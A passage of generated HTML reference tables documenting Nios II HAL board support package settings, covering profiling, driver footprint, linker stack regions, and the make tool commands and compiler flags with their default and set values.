<br>
<table border="1" bgcolor="#FFFFCC" width="60%">
<tr bgcolor="#77BBFF">
<td align="left" width="15%">Setting Name:</td><td align="left">hal.enable_gprof</td>
</tr>
<tr>
<td width="20%">Identifier:</td><td>ALT_PROVIDE_GMON</td>
</tr>
<tr>
<td width="20%">Default Value:</td><td>0</td>
</tr>
<tr>
<td width="20%">Value:</td><td>0</td>
</tr>
<tr>
<td width="20%">Type:</td><td>Boolean</td>
</tr>
<tr mode="wrap">
<td width="20%">Destination:</td><td>public_mk_define</td>
</tr>
<tr mode="wrap">
<td width="20%">Description:</td><td>Causes code to be compiled with gprof profiling enabled and the application ELF to be linked with the GPROF library. If true, adds -DALT_PROVIDE_GMON to ALT_CPPFLAGS and -pg to ALT_CFLAGS in public.mk.</td>
</tr>
<tr mode="wrap">
<td width="20%">Restrictions:</td><td>none</td>
</tr>
</table>
<br>
<table border="1" bgcolor="#FFFFCC" width="60%">
<tr bgcolor="#77BBFF">
<td align="left" width="15%">Setting Name:</td><td align="left">hal.enable_instruction_related_exceptions_api</td>
</tr>
<tr>
<td width="20%">Identifier:</td><td>ALT_INCLUDE_INSTRUCTION_RELATED_EXCEPTION_API</td>
</tr>
<tr>
<td width="20%">Default Value:</td><td>false</td>
</tr>
<tr>
<td width="20%">Value:</td><td>false</td>
</tr>
<tr>
<td width="20%">Type:</td><td>BooleanDefineOnly</td>
</tr>
<tr mode="wrap">
<td width="20%">Destination:</td><td>system_h_define</td>
</tr>
<tr mode="wrap">
<td width="20%">Description:</td><td>Enables API for registering handlers to service instruction-related exceptions. Enabling this setting increases the size of the exception entry code.</td>
</tr>
<tr mode="wrap">
<td width="20%">Restrictions:</td><td>These exception types can be generated if various processor options are enabled, such as the MMU, MPU, or other advanced exception types.</td>
</tr>
</table>
<br>
<table border="1" bgcolor="#FFFFCC" width="60%">
<tr bgcolor="#77BBFF">
<td align="left" width="15%">Setting Name:</td><td align="left">hal.enable_lightweight_device_driver_api</td>
</tr>
<tr>
<td width="20%">Identifier:</td><td>ALT_USE_DIRECT_DRIVERS</td>
</tr>
<tr>
<td width="20%">Default Value:</td><td>0</td>
</tr>
<tr>
<td width="20%">Value:</td><td>0</td>
</tr>
<tr>
<td width="20%">Type:</td><td>Boolean</td>
</tr>
<tr mode="wrap">
<td width="20%">Destination:</td><td>public_mk_define</td>
</tr>
<tr mode="wrap">
<td width="20%">Description:</td><td>Enables lightweight device driver API. This reduces code and data footprint by removing the HAL layer that maps device names (e.g. /dev/uart0) to file descriptors. Instead, driver routines are called directly. The open(), close(), and lseek() routines will always fail if called. The read(), write(), fstat(), ioctl(), and isatty() routines only work for the stdio devices. If true, adds -DALT_USE_DIRECT_DRIVERS to ALT_CPPFLAGS in public.mk.</td>
</tr>
<tr mode="wrap">
<td width="20%">Restrictions:</td><td>The Altera Host and read-only ZIP file systems can't be used if hal.enable_lightweight_device_driver_api is true.</td>
</tr>
</table>
<br>
<table border="1" bgcolor="#FFFFCC" width="60%">
<tr bgcolor="#77BBFF">
<td align="left" width="15%">Setting Name:</td><td align="left">hal.enable_mul_div_emulation</td>
</tr>
<tr>
<td width="20%">Identifier:</td><td>ALT_NO_INSTRUCTION_EMULATION</td>
</tr>
<tr>
<td width="20%">Default Value:</td><td>0</td>
</tr>
<tr>
<td width="20%">Value:</td><td>0</td>
</tr>
<tr>
<td width="20%">Type:</td><td>Boolean</td>
</tr>
<tr mode="wrap">
<td width="20%">Destination:</td><td>public_mk_define</td>
</tr>
<tr mode="wrap">
<td width="20%">Description:</td><td>Adds code to emulate multiply and divide instructions in case they are executed but aren't present in the CPU. Normally this isn't required because the compiler won't use multiply and divide instructions that aren't present in the CPU. If false, adds -DALT_NO_INSTRUCTION_EMULATION to ALT_CPPFLAGS in public.mk.</td>
</tr>
<tr mode="wrap">
<td width="20%">Restrictions:</td><td>none</td>
</tr>
</table>
<br>
<table border="1" bgcolor="#FFFFCC" width="60%">
<tr bgcolor="#77BBFF">
<td align="left" width="15%">Setting Name:</td><td align="left">hal.enable_reduced_device_drivers</td>
</tr>
<tr>
<td width="20%">Identifier:</td><td>ALT_USE_SMALL_DRIVERS</td>
</tr>
<tr>
<td width="20%">Default Value:</td><td>0</td>
</tr>
<tr>
<td width="20%">Value:</td><td>0</td>
</tr>
<tr>
<td width="20%">Type:</td><td>Boolean</td>
</tr>
<tr mode="wrap">
<td width="20%">Destination:</td><td>public_mk_define</td>
</tr>
<tr mode="wrap">
<td width="20%">Description:</td><td>Certain drivers are compiled with reduced functionality to reduce code footprint. Not all drivers observe this setting. The altera_avalon_uart and altera_avalon_jtag_uart drivers switch from interrupt-driven to polled operation. CAUTION: Several device drivers are disabled entirely. These include the altera_avalon_cfi_flash, altera_avalon_epcs_flash_controller, and altera_avalon_lcd_16207 drivers. This can result in certain API (HAL flash access routines) to fail. You can define a symbol provided by each driver to prevent it from being removed. If true, adds -DALT_USE_SMALL_DRIVERS to ALT_CPPFLAGS in public.mk.</td>
</tr>
<tr mode="wrap">
<td width="20%">Restrictions:</td><td>none</td>
</tr>
</table>
<br>
<table border="1" bgcolor="#FFFFCC" width="60%">
<tr bgcolor="#77BBFF">
<td align="left" width="15%">Setting Name:</td><td align="left">hal.enable_runtime_stack_checking</td>
</tr>
<tr>
<td width="20%">Identifier:</td><td>ALT_STACK_CHECK</td>
</tr>
<tr>
<td width="20%">Default Value:</td><td>0</td>
</tr>
<tr>
<td width="20%">Value:</td><td>0</td>
</tr>
<tr>
<td width="20%">Type:</td><td>Boolean</td>
</tr>
<tr mode="wrap">
<td width="20%">Destination:</td><td>public_mk_define</td>
</tr>
<tr mode="wrap">
<td width="20%">Description:</td><td>Turns on HAL runtime stack checking feature. Enabling this setting causes additional code to be placed into each subroutine call to generate an exception if a stack collision occurs with the heap or statically allocated data. If true, adds -DALT_STACK_CHECK and -fstack-check to ALT_CPPFLAGS in public.mk.</td>
</tr>
<tr mode="wrap">
<td width="20%">Restrictions:</td><td>none</td>
</tr>
</table>
<br>
<table border="1" bgcolor="#FFFFCC" width="60%">
<tr bgcolor="#77BBFF">
<td align="left" width="15%">Setting Name:</td><td align="left">hal.enable_sim_optimize</td>
</tr>
<tr>
<td width="20%">Identifier:</td><td>ALT_SIM_OPTIMIZE</td>
</tr>
<tr>
<td width="20%">Default Value:</td><td>0</td>
</tr>
<tr>
<td width="20%">Value:</td><td>0</td>
</tr>
<tr>
<td width="20%">Type:</td><td>Boolean</td>
</tr>
<tr mode="wrap">
<td width="20%">Destination:</td><td>public_mk_define</td>
</tr>
<tr mode="wrap">
<td width="20%">Description:</td><td>The BSP is compiled with optimizations to speedup HDL simulation such as initializing the cache, clearing the .bss section, and skipping long delay loops. If true, adds -DALT_SIM_OPTIMIZE to ALT_CPPFLAGS in public.mk.</td>
</tr>
<tr mode="wrap">
<td width="20%">Restrictions:</td><td>When this setting is true, the BSP shouldn't be used to build applications that are expected to run real hardware.</td>
</tr>
</table>
<br>
<table border="1" bgcolor="#FFFFCC" width="60%">
<tr bgcolor="#77BBFF">
<td align="left" width="15%">Setting Name:</td><td align="left">hal.enable_small_c_library</td>
</tr>
<tr>
<td width="20%">Identifier:</td><td>NONE</td>
</tr>
<tr>
<td width="20%">Default Value:</td><td>0</td>
</tr>
<tr>
<td width="20%">Value:</td><td>0</td>
</tr>
<tr>
<td width="20%">Type:</td><td>Boolean</td>
</tr>
<tr mode="wrap">
<td width="20%">Destination:</td><td>public_mk_define</td>
</tr>
<tr mode="wrap">
<td width="20%">Description:</td><td>Causes the small newlib (C library) to be used. This reduces code and data footprint at the expense of reduced functionality. Several newlib features are removed such as floating-point support in printf(), stdin input routines, and buffered I/O. The small C library is not compatible with Micrium MicroC/OS-II. If true, adds -msmallc to ALT_LDFLAGS in public.mk.</td>
</tr>
<tr mode="wrap">
<td width="20%">Restrictions:</td><td>none</td>
</tr>
</table>
<br>
<table border="1" bgcolor="#FFFFCC" width="60%">
<tr bgcolor="#77BBFF">
<td align="left" width="15%">Setting Name:</td><td align="left">hal.enable_sopc_sysid_check</td>
</tr>
<tr>
<td width="20%">Identifier:</td><td>NONE</td>
</tr>
<tr>
<td width="20%">Default Value:</td><td>1</td>
</tr>
<tr>
<td width="20%">Value:</td><td>1</td>
</tr>
<tr>
<td width="20%">Type:</td><td>Boolean</td>
</tr>
<tr mode="wrap">
<td width="20%">Destination:</td><td>public_mk_define</td>
</tr>
<tr mode="wrap">
<td width="20%">Description:</td><td>Enable SOPC Builder System ID. If a System ID SOPC Builder component is connected to the CPU associated with this BSP, it will be enabled in the creation of command-line arguments to download an ELF to the target. Otherwise, system ID and timestamp values are left out of public.mk for application Makefile "download-elf" target definition. With the system ID check disabled, the Nios II EDS tools will not automatically ensure that the application .elf file (and BSP it is linked against) corresponds to the hardware design on the target. If false, adds --accept-bad-sysid to SOPC_SYSID_FLAG in public.mk.</td>
</tr>
<tr mode="wrap">
<td width="20%">Restrictions:</td><td>none</td>
</tr>
</table>
<br>
<table border="1" bgcolor="#FFFFCC" width="60%">
<tr bgcolor="#77BBFF">
<td align="left" width="15%">Setting Name:</td><td align="left">hal.linker.allow_code_at_reset</td>
</tr>
<tr>
<td width="20%">Identifier:</td><td>ALT_ALLOW_CODE_AT_RESET</td>
</tr>
<tr>
<td width="20%">Default Value:</td><td>0</td>
</tr>
<tr>
<td width="20%">Value:</td><td>1</td>
</tr>
<tr>
<td width="20%">Type:</td><td>Boolean</td>
</tr>
<tr mode="wrap">
<td width="20%">Destination:</td><td>none</td>
</tr>
<tr mode="wrap">
<td width="20%">Description:</td><td>Indicates if initialization code is allowed at the reset address. If true, defines the macro ALT_ALLOW_CODE_AT_RESET in linker.h.</td>
</tr>
<tr mode="wrap">
<td width="20%">Restrictions:</td><td>If true, defines the macro ALT_ALLOW_CODE_AT_RESET in linker.h. This setting is typically false if an external bootloader (e.g. flash bootloader) is present.</td>
</tr>
</table>
<br>
<table border="1" bgcolor="#FFFFCC" width="60%">
<tr bgcolor="#77BBFF">
<td align="left" width="15%">Setting Name:</td><td align="left">hal.linker.enable_alt_load</td>
</tr>
<tr>
<td width="20%">Identifier:</td><td>NONE</td>
</tr>
<tr>
<td width="20%">Default Value:</td><td>0</td>
</tr>
<tr>
<td width="20%">Value:</td><td>1</td>
</tr>
<tr>
<td width="20%">Type:</td><td>Boolean</td>
</tr>
<tr mode="wrap">
<td width="20%">Destination:</td><td>none</td>
</tr>
<tr mode="wrap">
<td width="20%">Description:</td><td>Enables the alt_load() facility. The alt_load() facility copies sections from the .text memory into RAM. If true, this setting sets up the VMA/LMA of sections in linker.x to allow them to be loaded into the .text memory.</td>
</tr>
<tr mode="wrap">
<td width="20%">Restrictions:</td><td>This setting is typically false if an external bootloader (e.g. flash bootloader) is present.</td>
</tr>
</table>
<br>
<table border="1" bgcolor="#FFFFCC" width="60%">
<tr bgcolor="#77BBFF">
<td align="left" width="15%">Setting Name:</td><td align="left">hal.linker.enable_alt_load_copy_exceptions</td>
</tr>
<tr>
<td width="20%">Identifier:</td><td>NONE</td>
</tr>
<tr>
<td width="20%">Default Value:</td><td>0</td>
</tr>
<tr>
<td width="20%">Value:</td><td>0</td>
</tr>
<tr>
<td width="20%">Type:</td><td>Boolean</td>
</tr>
<tr mode="wrap">
<td width="20%">Destination:</td><td>none</td>
</tr>
<tr mode="wrap">
<td width="20%">Description:</td><td>Causes the alt_load() facility to copy the .exceptions section. If true, this setting defines the macro ALT_LOAD_COPY_EXCEPTIONS in linker.h.</td>
</tr>
<tr mode="wrap">
<td width="20%">Restrictions:</td><td>none</td>
</tr>
</table>
<br>
<table border="1" bgcolor="#FFFFCC" width="60%">
<tr bgcolor="#77BBFF">
<td align="left" width="15%">Setting Name:</td><td align="left">hal.linker.enable_alt_load_copy_rodata</td>
</tr>
<tr>
<td width="20%">Identifier:</td><td>NONE</td>
</tr>
<tr>
<td width="20%">Default Value:</td><td>0</td>
</tr>
<tr>
<td width="20%">Value:</td><td>0</td>
</tr>
<tr>
<td width="20%">Type:</td><td>Boolean</td>
</tr>
<tr mode="wrap">
<td width="20%">Destination:</td><td>none</td>
</tr>
<tr mode="wrap">
<td width="20%">Description:</td><td>Causes the alt_load() facility to copy the .rodata section. If true, this setting defines the macro ALT_LOAD_COPY_RODATA in linker.h.</td>
</tr>
<tr mode="wrap">
<td width="20%">Restrictions:</td><td>none</td>
</tr>
</table>
<br>
<table border="1" bgcolor="#FFFFCC" width="60%">
<tr bgcolor="#77BBFF">
<td align="left" width="15%">Setting Name:</td><td align="left">hal.linker.enable_alt_load_copy_rwdata</td>
</tr>
<tr>
<td width="20%">Identifier:</td><td>NONE</td>
</tr>
<tr>
<td width="20%">Default Value:</td><td>0</td>
</tr>
<tr>
<td width="20%">Value:</td><td>1</td>
</tr>
<tr>
<td width="20%">Type:</td><td>Boolean</td>
</tr>
<tr mode="wrap">
<td width="20%">Destination:</td><td>none</td>
</tr>
<tr mode="wrap">
<td width="20%">Description:</td><td>Causes the alt_load() facility to copy the .rwdata section. If true, this setting defines the macro ALT_LOAD_COPY_RWDATA in linker.h.</td>
</tr>
<tr mode="wrap">
<td width="20%">Restrictions:</td><td>none</td>
</tr>
</table>
<br>
<table border="1" bgcolor="#FFFFCC" width="60%">
<tr bgcolor="#77BBFF">
<td align="left" width="15%">Setting Name:</td><td align="left">hal.linker.enable_exception_stack</td>
</tr>
<tr>
<td width="20%">Identifier:</td><td>NONE</td>
</tr>
<tr>
<td width="20%">Default Value:</td><td>0</td>
</tr>
<tr>
<td width="20%">Value:</td><td>0</td>
</tr>
<tr>
<td width="20%">Type:</td><td>Boolean</td>
</tr>
<tr mode="wrap">
<td width="20%">Destination:</td><td>none</td>
</tr>
<tr mode="wrap">
<td width="20%">Description:</td><td>Enables use of a separate exception stack. If true, defines the macro ALT_EXCEPTION_STACK in linker.h, adds a memory region called exception_stack to linker.x, and provides the symbols __alt_exception_stack_pointer and __alt_exception_stack_limit in linker.x.</td>
</tr>
<tr mode="wrap">
<td width="20%">Restrictions:</td><td>The hal.linker.exception_stack_size and hal.linker.exception_stack_memory_region_name settings must also be valid. This setting must be false for MicroC/OS-II BSPs. The exception stack can be used to improve interrupt and other exception performance if the EIC is *not* used.</td>
</tr>
</table>
<br>
<table border="1" bgcolor="#FFFFCC" width="60%">
<tr bgcolor="#77BBFF">
<td align="left" width="15%">Setting Name:</td><td align="left">hal.linker.enable_interrupt_stack</td>
</tr>
<tr>
<td width="20%">Identifier:</td><td>NONE</td>
</tr>
<tr>
<td width="20%">Default Value:</td><td>0</td>
</tr>
<tr>
<td width="20%">Value:</td><td>0</td>
</tr>
<tr>
<td width="20%">Type:</td><td>Boolean</td>
</tr>
<tr mode="wrap">
<td width="20%">Destination:</td><td>none</td>
</tr>
<tr mode="wrap">
<td width="20%">Description:</td><td>Enables use of a separate interrupt stack. If true, defines the macro ALT_INTERRUPT_STACK in linker.h, adds a memory region called interrupt_stack to linker.x, and provides the symbols __alt_interrupt_stack_pointer and __alt_interrupt_stack_limit in linker.x.</td>
</tr>
<tr mode="wrap">
<td width="20%">Restrictions:</td><td>The hal.linker.interrupt_stack_size and hal.linker.interrupt_stack_memory_region_name settings must also be valid. This setting must be false for MicroC/OS-II BSPs. Only enable if the EIC is used exclusively. The exception stack can be used to improve interrupt and other exception performance if the EIC is *not* used.</td>
</tr>
</table>
<br>
<table border="1" bgcolor="#FFFFCC" width="60%">
<tr bgcolor="#77BBFF">
<td align="left" width="15%">Setting Name:</td><td align="left">hal.linker.exception_stack_memory_region_name</td>
</tr>
<tr>
<td width="20%">Identifier:</td><td>NONE</td>
</tr>
<tr>
<td width="20%">Default Value:</td><td>none</td>
</tr>
<tr>
<td width="20%">Value:</td><td>sdram</td>
</tr>
<tr>
<td width="20%">Type:</td><td>UnquotedString</td>
</tr>
<tr mode="wrap">
<td width="20%">Destination:</td><td>none</td>
</tr>
<tr mode="wrap">
<td width="20%">Description:</td><td>Name of the existing memory region that will be divided up to create the 'exception_stack' memory region. The selected region name will be adjusted automatically when the BSP is generated to create the 'exception_stack' memory region.</td>
</tr>
<tr mode="wrap">
<td width="20%">Restrictions:</td><td>Only used if hal.linker.enable_exception_stack is true.</td>
</tr>
</table>
<br>
<table border="1" bgcolor="#FFFFCC" width="60%">
<tr bgcolor="#77BBFF">
<td align="left" width="15%">Setting Name:</td><td align="left">hal.linker.exception_stack_size</td>
</tr>
<tr>
<td width="20%">Identifier:</td><td>NONE</td>
</tr>
<tr>
<td width="20%">Default Value:</td><td>1024</td>
</tr>
<tr>
<td width="20%">Value:</td><td>1024</td>
</tr>
<tr>
<td width="20%">Type:</td><td>DecimalNumber</td>
</tr>
<tr mode="wrap">
<td width="20%">Destination:</td><td>none</td>
</tr>
<tr mode="wrap">
<td width="20%">Description:</td><td>Size of the exception stack in bytes.</td>
</tr>
<tr mode="wrap">
<td width="20%">Restrictions:</td><td>Only used if hal.linker.enable_exception_stack is true.</td>
</tr>
</table>
<br>
<table border="1" bgcolor="#FFFFCC" width="60%">
<tr bgcolor="#77BBFF">
<td align="left" width="15%">Setting Name:</td><td align="left">hal.linker.interrupt_stack_memory_region_name</td>
</tr>
<tr>
<td width="20%">Identifier:</td><td>NONE</td>
</tr>
<tr>
<td width="20%">Default Value:</td><td>none</td>
</tr>
<tr>
<td width="20%">Value:</td><td>sdram</td>
</tr>
<tr>
<td width="20%">Type:</td><td>UnquotedString</td>
</tr>
<tr mode="wrap">
<td width="20%">Destination:</td><td>none</td>
</tr>
<tr mode="wrap">
<td width="20%">Description:</td><td>Name of the existing memory region that will be divided up to create the 'interrupt_stack' memory region. The selected region name will be adjusted automatically when the BSP is generated to create the 'interrupt_stack' memory region.</td>
</tr>
<tr mode="wrap">
<td width="20%">Restrictions:</td><td>Only used if hal.linker.enable_interrupt_stack is true.</td>
</tr>
</table>
<br>
<table border="1" bgcolor="#FFFFCC" width="60%">
<tr bgcolor="#77BBFF">
<td align="left" width="15%">Setting Name:</td><td align="left">hal.linker.interrupt_stack_size</td>
</tr>
<tr>
<td width="20%">Identifier:</td><td>NONE</td>
</tr>
<tr>
<td width="20%">Default Value:</td><td>1024</td>
</tr>
<tr>
<td width="20%">Value:</td><td>1024</td>
</tr>
<tr>
<td width="20%">Type:</td><td>DecimalNumber</td>
</tr>
<tr mode="wrap">
<td width="20%">Destination:</td><td>none</td>
</tr>
<tr mode="wrap">
<td width="20%">Description:</td><td>Size of the interrupt stack in bytes.</td>
</tr>
<tr mode="wrap">
<td width="20%">Restrictions:</td><td>Only used if hal.linker.enable_interrupt_stack is true.</td>
</tr>
</table>
<br>
<table border="1" bgcolor="#FFFFCC" width="60%">
<tr bgcolor="#77BBFF">
<td align="left" width="15%">Setting Name:</td><td align="left">hal.log_flags</td>
</tr>
<tr>
<td width="20%">Identifier:</td><td>ALT_LOG_FLAGS</td>
</tr>
<tr>
<td width="20%">Default Value:</td><td>0</td>
</tr>
<tr>
<td width="20%">Value:</td><td>0</td>
</tr>
<tr>
<td width="20%">Type:</td><td>DecimalNumber</td>
</tr>
<tr mode="wrap">
<td width="20%">Destination:</td><td>public_mk_define</td>
</tr>
<tr mode="wrap">
<td width="20%">Description:</td><td>The value is assigned to ALT_LOG_FLAGS in the generated public.mk. See hal.log_port setting description. Values can be -1 through 3.</td>
</tr>
<tr mode="wrap">
<td width="20%">Restrictions:</td><td>hal.log_port must be set for this to be used.</td>
</tr>
</table>
<br>
<table border="1" bgcolor="#FFFFCC" width="60%">
<tr bgcolor="#77BBFF">
<td align="left" width="15%">Setting Name:</td><td align="left">hal.log_port</td>
</tr>
<tr>
<td width="20%">Identifier:</td><td>NONE</td>
</tr>
<tr>
<td width="20%">Default Value:</td><td>none</td>
</tr>
<tr>
<td width="20%">Value:</td><td>none</td>
</tr>
<tr>
<td width="20%">Type:</td><td>UnquotedString</td>
</tr>
<tr mode="wrap">
<td width="20%">Destination:</td><td>public_mk_define</td>
</tr>
<tr mode="wrap">
<td width="20%">Description:</td><td>Slave descriptor of debug logging character-mode device. If defined, it enables extra debug messages in the HAL source. This setting is used by the ALT_LOG_PORT family of defines in system.h.</td>
</tr>
<tr mode="wrap">
<td width="20%">Restrictions:</td><td>none</td>
</tr>
</table>
<br>
<table border="1" bgcolor="#FFFFCC" width="60%">
<tr bgcolor="#77BBFF">
<td align="left" width="15%">Setting Name:</td><td align="left">hal.make.ar</td>
</tr>
<tr>
<td width="20%">Identifier:</td><td>AR</td>
</tr>
<tr>
<td width="20%">Default Value:</td><td>nios2-elf-ar</td>
</tr>
<tr>
<td width="20%">Value:</td><td>nios2-elf-ar</td>
</tr>
<tr>
<td width="20%">Type:</td><td>UnquotedString</td>
</tr>
<tr mode="wrap">
<td width="20%">Destination:</td><td>makefile_variable</td>
</tr>
<tr mode="wrap">
<td width="20%">Description:</td><td>Archiver command. Creates library files.</td>
</tr>
<tr mode="wrap">
<td width="20%">Restrictions:</td><td>none</td>
</tr>
</table>
<br>
<table border="1" bgcolor="#FFFFCC" width="60%">
<tr bgcolor="#77BBFF">
<td align="left" width="15%">Setting Name:</td><td align="left">hal.make.ar_post_process</td>
</tr>
<tr>
<td width="20%">Identifier:</td><td>AR_POST_PROCESS</td>
</tr>
<tr>
<td width="20%">Default Value:</td><td>none</td>
</tr>
<tr>
<td width="20%">Value:</td><td>none</td>
</tr>
<tr>
<td width="20%">Type:</td><td>UnquotedString</td>
</tr>
<tr mode="wrap">
<td width="20%">Destination:</td><td>makefile_variable</td>
</tr>
<tr mode="wrap">
<td width="20%">Description:</td><td>Command executed after archiver execution.</td>
</tr>
<tr mode="wrap">
<td width="20%">Restrictions:</td><td>none</td>
</tr>
</table>
<br>
<table border="1" bgcolor="#FFFFCC" width="60%">
<tr bgcolor="#77BBFF">
<td align="left" width="15%">Setting Name:</td><td align="left">hal.make.ar_pre_process</td>
</tr>
<tr>
<td width="20%">Identifier:</td><td>AR_PRE_PROCESS</td>
</tr>
<tr>
<td width="20%">Default Value:</td><td>none</td>
</tr>
<tr>
<td width="20%">Value:</td><td>none</td>
</tr>
<tr>
<td width="20%">Type:</td><td>UnquotedString</td>
</tr>
<tr mode="wrap">
<td width="20%">Destination:</td><td>makefile_variable</td>
</tr>
<tr mode="wrap">
<td width="20%">Description:</td><td>Command executed before archiver execution.</td>
</tr>
<tr mode="wrap">
<td width="20%">Restrictions:</td><td>none</td>
</tr>
</table>
<br>
<table border="1" bgcolor="#FFFFCC" width="60%">
<tr bgcolor="#77BBFF">
<td align="left" width="15%">Setting Name:</td><td align="left">hal.make.as</td>
</tr>
<tr>
<td width="20%">Identifier:</td><td>AS</td>
</tr>
<tr>
<td width="20%">Default Value:</td><td>nios2-elf-gcc</td>
</tr>
<tr>
<td width="20%">Value:</td><td>nios2-elf-gcc</td>
</tr>
<tr>
<td width="20%">Type:</td><td>UnquotedString</td>
</tr>
<tr mode="wrap">
<td width="20%">Destination:</td><td>makefile_variable</td>
</tr>
<tr mode="wrap">
<td width="20%">Description:</td><td>Assembler command. Note that CC is used for .S files.</td>
</tr>
<tr mode="wrap">
<td width="20%">Restrictions:</td><td>none</td>
</tr>
</table>
<br>
<table border="1" bgcolor="#FFFFCC" width="60%">
<tr bgcolor="#77BBFF">
<td align="left" width="15%">Setting Name:</td><td align="left">hal.make.as_post_process</td>
</tr>
<tr>
<td width="20%">Identifier:</td><td>AS_POST_PROCESS</td>
</tr>
<tr>
<td width="20%">Default Value:</td><td>none</td>
</tr>
<tr>
<td width="20%">Value:</td><td>none</td>
</tr>
<tr>
<td width="20%">Type:</td><td>UnquotedString</td>
</tr>
<tr mode="wrap">
<td width="20%">Destination:</td><td>makefile_variable</td>
</tr>
<tr mode="wrap">
<td width="20%">Description:</td><td>Command executed after each assembly file is compiled.</td>
</tr>
<tr mode="wrap">
<td width="20%">Restrictions:</td><td>none</td>
</tr>
</table>
<br>
<table border="1" bgcolor="#FFFFCC" width="60%">
<tr bgcolor="#77BBFF">
<td align="left" width="15%">Setting Name:</td><td align="left">hal.make.as_pre_process</td>
</tr>
<tr>
<td width="20%">Identifier:</td><td>AS_PRE_PROCESS</td>
</tr>
<tr>
<td width="20%">Default Value:</td><td>none</td>
</tr>
<tr>
<td width="20%">Value:</td><td>none</td>
</tr>
<tr>
<td width="20%">Type:</td><td>UnquotedString</td>
</tr>
<tr mode="wrap">
<td width="20%">Destination:</td><td>makefile_variable</td>
</tr>
<tr mode="wrap">
<td width="20%">Description:</td><td>Command executed before each assembly file is compiled.</td>
</tr>
<tr mode="wrap">
<td width="20%">Restrictions:</td><td>none</td>
</tr>
</table>
<br>
<table border="1" bgcolor="#FFFFCC" width="60%">
<tr bgcolor="#77BBFF">
<td align="left" width="15%">Setting Name:</td><td align="left">hal.make.bsp_arflags</td>
</tr>
<tr>
<td width="20%">Identifier:</td><td>BSP_ARFLAGS</td>
</tr>
<tr>
<td width="20%">Default Value:</td><td>-src</td>
</tr>
<tr>
<td width="20%">Value:</td><td>-src</td>
</tr>
<tr>
<td width="20%">Type:</td><td>UnquotedString</td>
</tr>
<tr mode="wrap">
<td width="20%">Destination:</td><td>makefile_variable</td>
</tr>
<tr mode="wrap">
<td width="20%">Description:</td><td>Custom flags only passed to the archiver. This content of this variable is directly passed to the archiver rather than the more standard "ARFLAGS". The reason for this is that GNU Make assumes some default content in ARFLAGS. This setting defines the value of BSP_ARFLAGS in Makefile.</td>
</tr>
<tr mode="wrap">
<td width="20%">Restrictions:</td><td>none</td>
</tr>
</table>
<br>
<table border="1" bgcolor="#FFFFCC" width="60%">
<tr bgcolor="#77BBFF">
<td align="left" width="15%">Setting Name:</td><td align="left">hal.make.bsp_asflags</td>
</tr>
<tr>
<td width="20%">Identifier:</td><td>BSP_ASFLAGS</td>
</tr>
<tr>
<td width="20%">Default Value:</td><td>-Wa,-gdwarf2</td>
</tr>
<tr>
<td width="20%">Value:</td><td>-Wa,-gdwarf2</td>
</tr>
<tr>
<td width="20%">Type:</td><td>UnquotedString</td>
</tr>
<tr mode="wrap">
<td width="20%">Destination:</td><td>makefile_variable</td>
</tr>
<tr mode="wrap">
<td width="20%">Description:</td><td>Custom flags only passed to the assembler. This setting defines the value of BSP_ASFLAGS in Makefile.</td>
</tr>
<tr mode="wrap">
<td width="20%">Restrictions:</td><td>none</td>
</tr>
</table>
<br>
<table border="1" bgcolor="#FFFFCC" width="60%">
<tr bgcolor="#77BBFF">
<td align="left" width="15%">Setting Name:</td><td align="left">hal.make.bsp_cflags_debug</td>
</tr>
<tr>
<td width="20%">Identifier:</td><td>BSP_CFLAGS_DEBUG</td>
</tr>
<tr>
<td width="20%">Default Value:</td><td>-g</td>
</tr>
<tr>
<td width="20%">Value:</td><td>-g</td>
</tr>
<tr>
<td width="20%">Type:</td><td>UnquotedString</td>
</tr>
<tr mode="wrap">
<td width="20%">Destination:</td><td>makefile_variable</td>
</tr>
<tr mode="wrap">
<td width="20%">Description:</td><td>C/C++ compiler debug level. '-g' provides the default set of debug symbols typically required to debug a typical application. Omitting '-g' removes debug symbols from the ELF. This setting defines the value of BSP_CFLAGS_DEBUG in Makefile.</td>
</tr>
<tr mode="wrap">
<td width="20%">Restrictions:</td><td>none</td>
</tr>
</table>
<br>
<table border="1" bgcolor="#FFFFCC" width="60%">
<tr bgcolor="#77BBFF">
<td align="left" width="15%">Setting Name:</td><td align="left">hal.make.bsp_cflags_defined_symbols</td>
</tr>
<tr>
<td width="20%">Identifier:</td><td>BSP_CFLAGS_DEFINED_SYMBOLS</td>
</tr>
<tr>
<td width="20%">Default Value:</td><td>none</td>
</tr>
<tr>
<td width="20%">Value:</td><td>none</td>
</tr>
<tr>
<td width="20%">Type:</td><td>UnquotedString</td>
</tr>
<tr mode="wrap">
<td width="20%">Destination:</td><td>makefile_variable</td>
</tr>
<tr mode="wrap">
<td width="20%">Description:</td><td>Preprocessor macros to define. A macro definition in this setting has the same effect as a "#define" in source code. Adding "-DALT_DEBUG" to this setting has the same effect as "#define ALT_DEBUG" in a souce file. Adding "-DFOO=1" to this setting is equivalent to the macro "#define FOO 1" in a source file. Macros defined with this setting are applied to all .S, .c, and C++ files in the BSP. This setting defines the value of BSP_CFLAGS_DEFINED_SYMBOLS in the BSP Makefile.</td>
</tr>
<tr mode="wrap">
<td width="20%">Restrictions:</td><td>none</td>
</tr>
</table>
<br>
<table border="1" bgcolor="#FFFFCC" width="60%">
<tr bgcolor="#77BBFF">
<td align="left" width="15%">Setting Name:</td><td align="left">hal.make.bsp_cflags_optimization</td>
</tr>
<tr>
<td width="20%">Identifier:</td><td>BSP_CFLAGS_OPTIMIZATION</td>
</tr>
<tr>
<td width="20%">Default Value:</td><td>-O0</td>
</tr>
<tr>
<td width="20%">Value:</td><td>-O0</td>
</tr>
<tr>
<td width="20%">Type:</td><td>UnquotedString</td>
</tr>
<tr mode="wrap">
<td width="20%">Destination:</td><td>makefile_variable</td>
</tr>
<tr mode="wrap">
<td width="20%">Description:</td><td>C/C++ compiler optimization level. "-O0" = no optimization,"-O2" = "normal" optimization, etc. "-O0" is recommended for code that you want to debug since compiler optimization can remove variables and produce non-sequential execution of code while debugging. This setting defines the value of BSP_CFLAGS_OPTIMIZATION in Makefile.</td>
</tr>
<tr mode="wrap">
<td width="20%">Restrictions:</td><td>none</td>
</tr>
</table>
<br>
<table border="1" bgcolor="#FFFFCC" width="60%">
<tr bgcolor="#77BBFF">
<td align="left" width="15%">Setting Name:</td><td align="left">hal.make.bsp_cflags_undefined_symbols</td>
</tr>
<tr>
<td width="20%">Identifier:</td><td>BSP_CFLAGS_UNDEFINED_SYMBOLS</td>
</tr>
<tr>
<td width="20%">Default Value:</td><td>none</td>
</tr>
<tr>
<td width="20%">Value:</td><td>none</td>
</tr>
<tr>
<td width="20%">Type:</td><td>UnquotedString</td>
